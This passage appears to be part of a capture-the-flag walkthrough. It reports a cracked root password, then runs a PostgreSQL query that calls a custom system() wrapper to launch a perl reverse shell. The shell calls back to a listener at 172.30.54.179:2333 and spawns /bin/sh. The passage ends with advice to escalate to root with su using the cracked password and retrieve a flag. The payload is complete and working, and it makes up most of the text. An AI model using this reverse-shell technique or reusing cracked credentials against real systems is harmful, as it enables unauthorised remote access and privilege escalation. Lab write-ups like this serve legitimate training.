Cracking the root hash yields P@ssw0rd123. Now get a shell on the database host: start a listener on web03 and have PostgreSQL reverse a shell with perl. Note that system() is not a built-in PostgreSQL function; the call below presupposes a user-defined C function wrapping libc's system() has been created first, which the postgres superuser is allowed to do.

-- dollar-quoted so the single quotes inside the perl one-liner survive psql's
-- default standard_conforming_strings=on, where \' does not escape a quote
select system($$perl -e 'use Socket;$i="172.30.54.179";$p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'$$);

From that postgres shell escalate to root (the cracked root password is the obvious candidate for su); flag04 is in /root/flag/.
